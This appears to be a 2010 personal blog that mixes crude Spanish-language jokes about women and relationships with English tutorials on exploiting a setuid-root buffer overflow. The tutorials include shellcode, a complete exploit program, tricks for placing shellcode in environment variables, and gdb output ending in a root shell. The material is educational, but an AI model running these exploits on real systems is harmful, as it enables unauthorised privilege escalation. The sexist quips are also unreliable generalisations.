Augusto's Blog

Ley Augustiana CLII

“La forma mas sencilla de manipular mentes debiles medio dormidas es enviando recados en nombre de sus futuras/posibles viejas”. Dedicada a @Oropher
vendetta

7 comments
{ filosofia augustiana }

Monday March 8, 2010 @ 18:31
Write a comment

Teoria Augustiana IX

Posted by vendetta on life

“Los chupetones para las mujeres son como la pipi para los perros. Sirven para marcar su territorio, en este caso a su 'hombre' y si acaso este ya tiene uno, le hacen otro aun mas grande”. Dedicada a Anais
vendetta

6 comments
{ filosofia augustiana }

Friday March 5, 2010 @ 16:56
Write a comment

Investigaciones Augustianas I

Posted by vendetta on life

“Investigaciones augustianas realizadas recientemente estiman que 1 de cada 3 tres mujeres tiran su celular al sanitario al menos una vez en sus vidas”.
vendetta

3 comments
{ filosofia augustiana }

Monday March 1, 2010 @ 10:14
Write a comment

12 corazones Belindosos

Posted by vendetta on life

Basando en el mundialmente famoso programa de la televisión 12 Corazones… llega hasta su lector de RSS 12 corazones Belindosos!!!!

(Aplausos)

12 corazonas (o que intentar ser) compitiendo en una serie de concursos creados especialmente por la famosa productora de programas de bloggivisión Diana Gabriela Navarrete, conducido por Tanusa y con la ayuda de Urkonn-O nuestro psiquico-quimico que ayudara las corazonas a encontrar la mejor forma de conquistar al inconquistable BelindoooooooooooFan!!!

(Aplausos)

Retos, preguntas comprometedoras, competencias, quien ganara?, quien se lo llevara?… quien se comera la pizza que incluyen al @BelindoFan!??… 12 corazones Belindosos… no te lo puedes perder

Casting abierto… aun faltan 4 corazonas

P.S. Diseño e imagen @kikitopechocho.

4 comments
{ augustianismos }

Sunday February 21, 2010 @ 18:05
Write a comment

Felicitenme!

Posted by vendetta on life

El macho, mujeriego y vivir Augustito ha contraido nupcias!

No comments yet
{ augustianismos }

Thursday February 18, 2010 @ 14:12
Write a comment

Ley Augustiana CLI

Posted by vendetta on life

“Las emociones y sentimientos que la gente cree sentir no es mas que respuesta biologica en el organismo. Un exceso de endorfinas seguidas de una respuesta cerebral basada en estimulos visuales y feromonas… el amor no es mas que un mito”. Dedicada al 14 de Febrero
vendetta

Sunday February 14, 2010 @ 00:40
Write a comment

Ley Augustiana CL

Posted by vendetta on life

“Lo único que funciona entre hombres y mujeres es el sexo”.
vendetta

9 comments
{ filosofia augustiana }

Tuesday February 9, 2010 @ 23:35
Write a comment

Allocating shellcodes into environment variables

Posted by vendetta on tech

When the buffer attacked is small a good trick is allocate our shellcodes into enviroment variables. Then obtaint the address of these variable and past it to the vulnerable code.

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

See how you can exploit a vulnerable code with this trick:

vendetta@pwned:~/booksrc $ gcc getenv_example.c -o getenv_example
vendetta@pwned:~/booksrc $ ./getenv_example SHELLCODE
SHELLCODE is at 0xbffff930
vendetta@pwned:~/booksrc $ ./notesearch $(perl -e 'print "\x30\xf9\xff\xbf"x40')
[DEBUG] found a 24 byte note for user id 501
-------[ end of note data ]-------
sh-3.2# exit

No comments yet
{ security, tips & tricks }

Tuesday February 9, 2010 @ 17:19
Write a comment

Extracting shellcodes from exploits

Posted by vendetta on tech

This is a little trick for extract shellcodes using BASH from a exploits.

vendetta@pwned:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
> do
> echo -en $i
> done > shellcode_extract.bin
vendetta@pwned:~/booksrc $ cat shellcode_extract.bin
1ï¿½1ï¿½1É�ï¿½ï¿½Í�j
          XQh//shh/binï¿½ï¿½Qï¿½ï¿½Sï¿½ï¿½Í�vendetta@pwned:~/booksrc $
vendetta@pwned:~/booksrc $ hexdump -C shellcode_extract.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023

Cheers!

No comments yet
{ security, tips & tricks }

Tuesday February 9, 2010 @ 11:28
Write a comment

Dangerous file/directory permissions

Posted by vendetta on tech

In the *NIX systems are two special permissions usefuls for a lot of important programas (included basic functions of the O.S.). Theses pecial permissions are the SIUD and GUID permissions.

Maybe you read about them in other websites or books, so I only want to show you the security related implications. As you know in Linux (for mention any O.S.) are files like /etc/passwd where critical information, in this case the passwords are saved; but someday did you ask you how this information be separed for all users?

If you execute the command passwd in a shell you can change your password, and if you enter to the system as other user and execute passwd you'll change the password for these other user, but all passwords are saved into the same file. How?

Well if you check the /etc/passwd's permissions you can see the answer:

vendetta@pwned:~ $ which passwd
/usr/bin/passwd
vendetta@pwned:~ $ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 29104 2006-12-19 14:35 /usr/bin/passwd
vendetta@pwned:~ $

If you're an observer you'll be noticing that in the permissions are a letter S insted of a letter X. This is because passwd command is a root's command, and in theory only a priviligiated user like root can execute it. However as mortal user we need to change our passwords, so with this special permission you can execute a root's command with temporal permissions, but with limited capabilities, in this case only modify our information.

That's cool…!

Hum… nou!. Remember the basic rule of getting shells. If you exploit a application and obtain a shell, this new shell comes from the user that were executing the application. So, if you exploit a root's application the new shell comes from root… OMG!!

In a example, imagine this code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "functions.h"

void usage(char *prog_name, char *filename) {
printf("Usage: %s <data to add to %s>\n", prog_name, filename);
exit(0);
}

void fatal(char *);
void *ec_malloc(unsigned int);

int main(int argc, char *argv[]) {
int userid, fd; // file descriptor
char *buffer, *datafile;

buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/var/notes");

if(argc < 2)
usage(argv[0], datafile);

strcpy(buffer, argv[1]);

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in main() while opening file");
printf("[DEBUG] file descriptor is %d\n", fd);

userid = getuid();

if(write(fd, &userid, 4) == -1)
fatal("in main() while writing userid to file");
write(fd, "\n", 1);

if(write(fd, buffer, strlen(buffer)) == -1)
fatal("in main() while writing buffer to file");
write(fd, "\n", 1);

if(close(fd) == -1)
fatal("in main() while closing file");

printf("Note has been saved.\n");
free(buffer);
free(datafile);
}

This program writes simples notes in /var/notes. The importan thing here is that then of each note the program mark them with the UID number, this is useful to separete information between users. Compile this program, change permissions (u+s) and change the owner and group to root:root.

So, look this other code:

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "functions.h"

#define FILENAME "/var/notes"

int print_notes(int, int, char *);
int find_user_note(int, int);
int search_note(char *, char *);
void fatal(char *);

int main(int argc, char *argv[]) {
int userid, printing=1, fd;
char searchstring[100];

if(argc > 1)
strcpy(searchstring, argv[1]);
else
searchstring[0] = 0;

userid = getuid();
fd = open(FILENAME, O_RDONLY);
if(fd == -1)
fatal("in main() while opening file for reading");

while(printing)
printing = print_notes(fd, userid, searchstring);
printf("-------[ end of note data ]-------\n");
close(fd);
}

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];

note_length = find_user_note(fd, uid);
if(note_length == -1)
return 0;

read(fd, note_buffer, note_length);
note_buffer[note_length] = 0;

if(search_note(note_buffer, searchstring))
printf(note_buffer);
return 1;
}

int find_user_note(int fd, int user_uid) {
int note_uid=-1;
unsigned char byte;
int length;

while(note_uid != user_uid) {
if(read(fd, &note_uid, 4) != 4)
return -1;
if(read(fd, &byte, 1) != 1)
return -1;

byte = length = 0;
while(byte != '\n') {
if(read(fd, &byte, 1) != 1)
return -1;
length++;
}
}
lseek(fd, length * -1, SEEK_CUR);

printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
return length;
}

int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;

keyword_length = strlen(keyword);
if(keyword_length == 0)
return 1;

for(i=0; i < strlen(note); i++) {
if(note[i] == keyword[match])
match++;
else {
if(note[i] == keyword[0])
match = 1;
else
match = 0;
}
if(match == keyword_length)
return 1;
}
return 0;
}

The past program searches the notes for each user based on their UIDs. So change permissions and owne.

And finally look this code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;

command = (char *) malloc(200);
bzero(command, 200);

strcpy(command, "./notesearch \'");
buffer = command + strlen(command);

if(argc > 1)
offset = atoi(argv[1]);

ret = (unsigned int) &i - offset;

for(i=0; i < 160; i+=4)
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60);
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

strcat(command, "\'");
system(command);
free(command);
}

Compile it with -g option in GCC and check debugging information:

vendetta@pwned:/home/vendetta/booksrc $ gdb -q exploit_notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4       char shellcode[]=
5       "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6       "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7       "\xe1\xcd\x80";
8
9       int main(int argc, char *argv[]) {
10         unsigned int i, *ptr, ret, offset=270;
(gdb)
11         char *command, *buffer;
12
13         command = (char *) malloc(200);
14         bzero(command, 200); // zero out the new memory
15
16         strcpy(command, "./notesearch \'"); // start command buffer
17         buffer = command + strlen(command); // set buffer at the end
18
19         if(argc > 1) // set offset
20            offset = atoi(argv[1]);
(gdb)
21
22         ret = (unsigned int) &i - offset; // set return address
23
24         for(i=0; i < 160; i+=4) // fill buffer with return address
25            *((unsigned int *)(buffer+i)) = ret;
26         memset(buffer, 0x90, 60); // build NOP sled
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
28
29         strcat(command, "\'");
30         system(command); // run exploit
(gdb)
31         free(command);
32      }
33
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
(gdb) run
Starting program: /home/vendetta/booksrc/exploit_notesearch

Breakpoint 1, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:26
26         memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/x40 buffer
A syntax error in expression, near `buffer'.
(gdb) x/40x buffer
0x804a016:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a026:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a036:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a046:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a056:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a066:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½"
(gdb) cont
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:27
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xbffff686
0x804a056:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a066:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½"
(gdb) cont
Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:29
29         strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xdb31c031
0x804a056:      0xb099c931      0x6a80cda4      0x6851580b      0x68732f2f
0x804a066:      0x69622f68      0x51e3896e      0x8953e289      0xbf80cde1
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "1ï¿½1ï¿½1ï¿½\231ï¿½ï¿½ï¿½\200j\vXQh//shh/bin\211ï¿½Q\211ï¿½S\211ï¿½ï¿½\200ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½\206ï¿½ï¿½ï¿½"
(gdb) cont
Continuing.
-------[ end of note data ]-------

Program exited normally.
(gdb) q
vendetta@pwned:/home/vendetta/booksrc $ ./exploit_notesearch
-------[ end of note data ]-------
sh-3.2#

As you can see in the GDB output the consecuentes of a vulnerability (in this case the use of strcpy() function) is terrible. But the problem isn't the use of special permissions, in fact is the best way to administrate a lot of thing in *NIX systems… the problem was the application.

Cheers!